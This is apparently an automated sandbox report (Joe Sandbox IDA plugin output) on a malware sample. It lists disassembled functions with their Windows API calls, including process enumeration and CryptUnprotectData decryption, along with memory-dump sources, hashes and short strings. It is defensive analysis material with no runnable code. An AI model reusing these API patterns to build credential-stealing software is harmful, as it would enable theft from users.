                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: a44eeb7e6d0ac43ca31760b063318f7d7c5191bb1a165bb59c3840dae5ee9d98
                              • Instruction ID: aecfd82babd7c03ace062bf0abff807efb5e41202bff668244896036469b7f72
                              • Opcode Fuzzy Hash: a44eeb7e6d0ac43ca31760b063318f7d7c5191bb1a165bb59c3840dae5ee9d98
                              • Instruction Fuzzy Hash: 9D012175B40308BFEB20DB94DC4AFAA7B78EB44B15F104155FB49EB2C4D6B5A900CB90
                              Function 011E7395 Relevance: 6.6, Strings: 4, Instructions: 1639COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !r~B$CZ;e$K"+i$O"+i
                              • API String ID: 0-4002564735
                              • Opcode ID: ce03117a56d0e50c3a3d61c88a65f4660e30f99840c398a27ba8194f373d7c97
                              • Instruction ID: f0125031c3ed12f3f1e23267fe00b2207385e74d1d4e0d70b4f34f7a5701ba9c
                              • Opcode Fuzzy Hash: ce03117a56d0e50c3a3d61c88a65f4660e30f99840c398a27ba8194f373d7c97
                              • Instruction Fuzzy Hash: A2B2F8F360C2049FE304AE2DEC8567AFBE9EF94720F16853DE6C4C7744EA3598058696
                              Function 00E53A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E53A96
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E53AA9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E53ABF
                                • Part of subcall function 00E57310: lstrlen.KERNEL32(------,00E35BEB), ref: 00E5731B
                                • Part of subcall function 00E57310: lstrcpy.KERNEL32(00000000), ref: 00E5733F
                                • Part of subcall function 00E57310: lstrcat.KERNEL32(?,------), ref: 00E57349
                                • Part of subcall function 00E57280: lstrcpy.KERNEL32(00000000), ref: 00E572AE
                              • CloseHandle.KERNEL32(00000000), ref: 00E53BF7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: dbeb405b035ad61a6b363e3f3beb79c4ded66ed684740d89555f2ddc0cb0ee5e
                              • Instruction ID: fa823d023a5153ca4094e5d9c73cecf5827190656e11a6f37ad4483d6e9838a1
                              • Opcode Fuzzy Hash: dbeb405b035ad61a6b363e3f3beb79c4ded66ed684740d89555f2ddc0cb0ee5e
                              • Instruction Fuzzy Hash: 9A81F870900204CFC764CF28D948B95B7F1FB4435AF29D5ADD848AB2A2D77A9D8ACF50
                              Function 00E3EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00E3EA76
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00E3EA7E
                              • lstrcat.KERNEL32(00E5CFEC,00E5CFEC), ref: 00E3EB27
                              • lstrcat.KERNEL32(00E5CFEC,00E5CFEC), ref: 00E3EB49
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: f4cbd1416c29cb5db726d43dd3394f627e8de2fa7d8f9b711a772a50dc38457d
                              • Instruction ID: 9fcfeb71914d1af88ab231e7df8ba6f38bb9c978912a8eec1cc5c8397b06e27b
                              • Opcode Fuzzy Hash: f4cbd1416c29cb5db726d43dd3394f627e8de2fa7d8f9b711a772a50dc38457d
                              • Instruction Fuzzy Hash: B7319575B00319ABDB209B98EC45FEEB77D9F44709F144165FA09F3280D7B55A08CBA1
                              Function 00E540B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00E540CD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00E540DC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E540E3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00E54113
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              • Opcode ID: a4d87cda0b4ded6b73de06f40df04add17a078d2e758e4a025041bb4d3d6688c
                              • Instruction ID: e89505b75b115749a88d0200bea0c202fd1f29c5c0ef7b9be744b51fc30c9b04
                              • Opcode Fuzzy Hash: a4d87cda0b4ded6b73de06f40df04add17a078d2e758e4a025041bb4d3d6688c
                              • Instruction Fuzzy Hash: A5015EB0600205BFDB208FA5DC45B6ABBADEF44315F108059FE4897280DA719940CB51
                              Function 00E52B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00E5A3D0,000000FF), ref: 00E52B8F
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00E52B96
                              • GetLocalTime.KERNEL32(?,?,00000000,00E5A3D0,000000FF), ref: 00E52BA2
                              • wsprintfA.USER32 ref: 00E52BCE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 60392c9f81a4cd4c8d0542224564a908eaf2b89916497f5bcd8d2c891eab0534
                              • Instruction ID: 502016ba30d1fd0d16c3879ec34b0d80c9717ee1efaa1c19c036b54ca9001fe9
                              • Opcode Fuzzy Hash: 60392c9f81a4cd4c8d0542224564a908eaf2b89916497f5bcd8d2c891eab0534
                              • Instruction Fuzzy Hash: EC0140B2904228AFDB249BC9DD45BBEB7BCFB4CB15F00421AFA45A2680E77D5440C7B1
                              Function 00E39B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E39B3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E39B4A
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E39B61
                              • LocalFree.KERNEL32 ref: 00E39B70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 726721e3e67a3280def231d9d9e05245e31f8b054d750b2189c3cbf9b8054ac6
                              • Instruction ID: a26f681522b9adcd071d9f98ff19f28c396ec002d1ac049ffdc2d64b67923e23
                              • Opcode Fuzzy Hash: 726721e3e67a3280def231d9d9e05245e31f8b054d750b2189c3cbf9b8054ac6
                              • Instruction Fuzzy Hash: 2AF01D703443126FF7301F64AC49F567BA8EF04B54F200114FA45EA2D4D7B69840CBA4
                              Function 011EE11E Relevance: 5.3, Strings: 3, Instructions: 1503COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 45};$G=eo$Rf}
                              • API String ID: 0-3202768079
                              • Opcode ID: ce8b2ecac9ca1f010791dec19d3e79fe4f5eb133b42bc2e29fdb284fbc0b79b2
                              • Instruction ID: d752ce57dc56f38e02c82c3dbf19297d17681dc59fa11d882d64a561e9cc9209
                              • Opcode Fuzzy Hash: ce8b2ecac9ca1f010791dec19d3e79fe4f5eb133b42bc2e29fdb284fbc0b79b2
                              • Instruction Fuzzy Hash: 57A2F4F350C2049FE304AF29DC8567AFBE9EF94720F1A493DEAC4C7744EA3558418696
                              Function 011EFA53 Relevance: 5.2, Strings: 3, Instructions: 1500COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: []}$i}$|ko
                              • API String ID: 0-3600771878
                              • Opcode ID: 4954ca911efdc282065005a299f717c25cc36071d3ee0260b25204b02c3c7d51
                              • Instruction ID: 3e509a54c3a0561324ddad1e964e88e1a3acd1d07acb7d606e603adbf06b5cb7
                              • Opcode Fuzzy Hash: 4954ca911efdc282065005a299f717c25cc36071d3ee0260b25204b02c3c7d51
                              • Instruction Fuzzy Hash: E8A2E3F360C204AFE3046F29EC8567AFBE9EB94720F16493DE6C587744EA3598058787
                              Function 00E4CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(00E5B110,00000000,00000001,00E5B100,?), ref: 00E4CB06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E4CB46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 00E4CBC9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              • Opcode ID: 99d03a26dee7debe3b0830e90a9cd18c94feb91cbee5eccae5402de78c3bb494
                              • Instruction ID: da46e6a3fa9cabfa1dabd86d3caf317564b327f598b20fadcb633f39bd4d36ec
                              • Opcode Fuzzy Hash: 99d03a26dee7debe3b0830e90a9cd18c94feb91cbee5eccae5402de78c3bb494
                              • Instruction Fuzzy Hash: FF317571A41718BFD754DB94CC82FAAB7B9DB88B10F104584FA44EB2D0D7B1AE44CB90
                              Function 00E39B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E39B9F
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E39BB3
                              • LocalFree.KERNEL32(?), ref: 00E39BD7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
